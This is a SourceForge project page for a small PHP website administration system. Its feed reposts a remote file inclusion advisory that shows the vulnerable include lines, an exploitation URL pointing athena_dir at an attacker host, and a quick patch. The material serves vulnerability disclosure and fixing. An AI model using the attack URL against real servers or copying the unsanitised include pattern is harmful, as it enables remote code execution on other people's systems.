A simple website management system written in oo php that uses a mysql database to store user and group rights and the site content.
Topics:
License:
Operating System:
Translations:
Intended Audience:
User Interface:
Programming Language:
Registered:
Ratings and Reviews
Be the first to post a text review of athena php website administration. Rate and review a project by clicking thumbs up or thumbs down in the right column.
Project Feed
-
Exploit
Edward Z. Yang pointed out that athena is exploitable. Quick fix: in athena.php, add the following code at the top of the file. Another (recommended!) solution is to run php in safe mode. 8< if (!(strpos($athena_dir, "tp://") === false)) { exit; } 8< --Exploit-- Language: PHP Script: Athena Version: 0.1a Official website: http://sourceforge.net/projects/athena Problem: Remote file inclusion Discovered by: beford & ][GB][ Description: =========== A simple website management system written in oo php that uses a mysql database to store user and group rights and the site content. Problem: ======== A remote user can include and execute arbitrary PHP code from the remote location. The problem is in the file "athena.php" for line 1 to 10: include("$athena_dir/headers.php"); include("$athena_dir/classes/debug.php"); include("$athena_dir/classes/mysql.php"); include("$athena_dir/classes/config.php"); include("$athena_dir/classes/page.php"); include("$athena_dir/classes/session.php"); include("$athena_dir/classes/user.php"); include("$athena_dir/classes/error.php"); include("$athena_dir/classes/modules.php"); include("$athena_dir/classes/admin.php"); Exploitation example: =================== http://[target]/path_to_athena/athena.php?athena_dir=http://[attacker_url] Solution: ======== Not solution at this time.
-
Code committed
olivermay committed patchset 9 of module athena to the athena php website administration CVS repository, changing 1 files -
Code committed
olivermay committed patchset 8 of module athena to the athena php website administration CVS repository, changing 1 files -
Code committed
olivermay committed patchset 7 of module athena to the athena php website administration CVS repository, changing 1 files -
Code committed
olivermay committed patchset 6 of module athena to the athena php website administration CVS repository, changing 1 files -
Code committed
olivermay committed patchset 5 of module athena to the athena php website administration CVS repository, changing 3 files -
File released: /athena/v0.1a (prerelease)/athena-0.1a.tar.gz
-
Code committed
olivermay committed patchset 4 of module athena to the athena php website administration CVS repository, changing 11 files -
Code committed
olivermay committed patchset 3 of module athena to the athena php website administration CVS repository, changing 1 files -
Code committed
olivermay committed patchset 2 of module athena to the athena php website administration CVS repository, changing 2 files
Rate and Review
Be the first person to add a text review.
Related Projects
-
WeBid - auction script
Open source php/mysql fully featured auction script. Perfect for those who want to start their own auction site.
-
ZeroSearchGooglePosition
Do you want to found your site position in google??This program found it for you. You pass your tag and the site you want to found and that's all.
-
athena php website administration Actions
About SourceForge
Develop Software
Copyright © 2009 Geeknet, Inc. All rights reserved. Terms of Use
